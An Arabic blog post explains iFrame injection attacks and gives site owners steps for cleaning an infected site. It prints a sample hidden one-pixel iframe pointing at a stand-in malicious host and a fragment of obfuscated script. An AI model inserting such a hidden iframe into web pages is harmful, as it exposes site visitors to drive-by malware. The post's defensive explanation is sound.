المواضيع RSS
تويتر
6:27 ص
Unknown
هجمات IFrame Injection
iFrame Injection
تعتبر iFrame Injection من الهجمات الجد الشائعة على شبكة الانترنيت فهي تتألف من وسوم IFrame و هي عبارة عن وسم من وسوم HTML ويتم استخدامها لدمج محتوى موقع و ادراجها في صفحات أو محتويات موقع أخر وعادة مايتم تحميل برامج تنفيذية (exe)خبيثة او اجراء عمليات أخرى تضر بأجهزة زوار الموقع المصاب ,ومعنى كلمة IFrame والتي في الحقيقة تتكون من كلميتين I وترمي الى invisible ومعناها غير مرئي وFrame معناها ايطار اي ايطار غير مرئي ولحسن الحظ تستطيع قوقل اكتشاف المواقع المصابة وتقوم بتحذير زوار تلك المواقع أما اذا حدث العكس وزار الزائر الموقع المصاب فسيتم تحميل واصابة جهازه ببرامج خبيثة.
مثال عن iFrame Injection
وأبسط مثال يمكن ان أقدمه هو كالتالي :
<iframe src=”http://www.badwebsite.com/inject/?s=some-parameters” width=”1″ height=”1″ style=”visibility: hidden”></iframe>
ولا يمكن للزائر أو صاحب الموقع أن يرى الحقنات الا اذا تم استعراض مصدر الصفحة وعادة ما توجه الى عنوان IP بدلا من موقع على شبكة الانترنيت .
الخطوات التي يجب اتباعها عند اصابة موقع ما
الخطوة الأولى
أول خطوة هي اغلاق الموقع للصيانة الى غاية العثور على مصدر العدوى وازالتها لتجنب وضع زوار الموقع عرضة للخطر.
الخطوة الثانية
قم بتغيير جميع كلمات المرور المتعلقة بالموقع وهذا يشمل كل من كلمات المرور الخاصة بالخول الى لوحة التحكم ,FTP , قواعد البيانات ..الى أخره.
وقم باستبدالها بأخرى قوية ويجب ان تحتوي على حروف وأرقام ورموز.
الخطوة الثالثة
قم باستبدال جميع ملفات الموقع بنسخة احتياطية بعد فحصها ببرنامج حماية للتأكد من عدم اصابتها باحدى البرامج الضارة .
الخطوة الرابعة
اما في حالة عدم وجود نسخ احتياطية للموقع في حين أنه لا ينصح بترك الملفات المصابة على الخادم قم بفتح جميع صفحات HTML أو PHP باستعمال احدى برامج تحرير النصوص للبحث عن أكواد IFrame المسببة للمشكلة فمن المحتمل أن يكون الكود الضار في أكثر من صفحة من صفحات الموقع ,واعتمادا على حجم الموقع قد يستغرق تنفيذ هذا العمل بعض الوقت .
هناك بعض الاكواد مشوشة حتى لا يتم التعرف عليها وقد تجدها على الشكل التالي :
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){…
الخطوة الخامسة
بعد رفع النسخة الاحتياطية و نزع جميع أكواد الضارة قم بالتحقق من أن المشكلة لم تعد موجودة , بعد ذلك يجب أن تعرف كيف تم حقن موقعك بالشيفرات الخبيثة للتأكد من عدم حدوثها مرة ثانية فربما تم حقن موقعك بسبب عدم تحديث برنامج ادارة المحتوى كوردبرس أو جومالا وغيرها كما قد يكون السبب اختيار الاستضافات رخيصة الثمن والذي لا يقوم بتحديث برامج الخادم وعدم اهتمامه بالجانب الأمني كما قد يكون السبب احدى تعليقات على احدى المواضيع باستعمال HTML .
0 التعليقات:
إرسال تعليق